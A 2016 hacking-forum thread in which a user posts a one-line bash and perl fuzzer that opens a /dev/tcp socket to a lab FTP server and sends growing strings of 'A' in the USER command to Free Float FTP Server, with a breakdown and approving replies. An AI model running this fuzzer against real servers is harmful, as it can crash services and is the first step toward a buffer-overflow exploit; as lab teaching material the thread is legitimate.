August 21, 2017, 06:52:26 PM
Welcome, Guest. Please login or register.

"Have you tried turning it off and then on again?"

Author Topic: FAST TRACK "Simple fuzzing Protocol FTP"  (Read 515 times)

Offline RedCor

  • Top Hat Member
  • Prospect
  • ********
  • Posts: 31
  • Internets: +5/-0
FAST TRACK "Simple fuzzing Protocol FTP"
« on: March 29, 2016, 06:39:30 AM »
FAST TRACK "Simple fuzzing Protocol FTP"

Here the attack pattern

a pc "Attacker"  and the "target"

########################
SIMPLE FUZZER ONE LINE  #
########################
CHEAT CODE ENABLED...
REMOTE SPACE BASE COMMANDER ...
PROTOCOL CYBERPREP XLEVEL5 STARTED ...
FUZZ NOW...
################################################################################################
MACHINE : PC wIN Seven (target) ; CRUNCHBANG(Attacker)                             #
USED SOFTWARE : bash, perl, Free Float FTP Server                  #
ATTACKER OBJECTIF : Fuzzing app with one line               #
################################################################################################

################################################################################################
#Install
Go download and install Free Float FTP Server
https://www.exploit-db.com/exploits/23243/

next go to your linux terminal for fuzz

################################################################################################
#Info

I dissasemble the command

Code: [Select]
for i in 10 50 100 200 250 300 = in i the value 10 50 100 200 250 300 just number
Code: [Select]
A=$(perl -E 'say "A" x '$i'') = Value A = A * $i = $i = 10 50 100 200 250 300
Code: [Select]
exec 3<>/dev/tcp/192.168.0.14/21 = your socket /dev/tcp/yourip/yourpor
Code: [Select]
read <&3 && echo "$3" && echo "[+]Send USER  with buff size '$i'"  = show [+]Send USER  with buff size '$i'
Code: [Select]
echo "USER '$A'" >&3 && read <&3 = inject in &3 USER + number of AAAAA
################################################################################################
#Start Attack !!!

for i in 10 50 100 200 250 300;do A=$(perl -E 'say "A" x '$i''); exec 3<>/dev/tcp/192.168.0.14/21 && read <&3 && echo "$3" && echo "
  • Send USER  with buff size '$i'" && echo "USER '$A'" >&3 && read <&3  ;done
Code: [Select]
for i in 10 50 100 200 250 300;do A=$(perl -E 'say "A" x '$i''); exec 3<>/dev/tcp/192.168.0.14/21 && read <&3 && echo "$3" && echo "[+]Send USER  with buff size '$i'" && echo "USER '$A'" >&3 && read <&3  ;done




Video link of the attack
https://vimeo.com/160739640

here is a simple fuzzing next time I show you then use the command fuzzer crash

Thanks for readme
« Last Edit: March 31, 2016, 08:37:45 AM by RedCor »

Offline TAPE

  • Top Hat Member Moderator
  • Elite
  • ********
  • Posts: 1247
  • Internets: +193/-0
Re: FAST TRACK "Simple fuzzing command"
« Reply #1 on: March 29, 2016, 07:06:31 AM »
I'm liking them one-liners,pretty neat !

Take all the advice you like and then tell everyone to **** off and do your own thing -- Gitsnik

Offline H4v0K

  • Administrator
  • Elite
  • *****
  • Posts: 1019
  • Internets: +986/-1
Re: FAST TRACK "Simple fuzzing command"
« Reply #2 on: March 29, 2016, 07:11:42 AM »
And a video too very nice ,thanks for sharing  +1 :)

Offline RedCor

  • Top Hat Member
  • Prospect
  • ********
  • Posts: 31
  • Internets: +5/-0
Re: FAST TRACK "Simple fuzzing command"
« Reply #3 on: March 30, 2016, 09:39:21 AM »
Thank you very much, I will prepare the other :)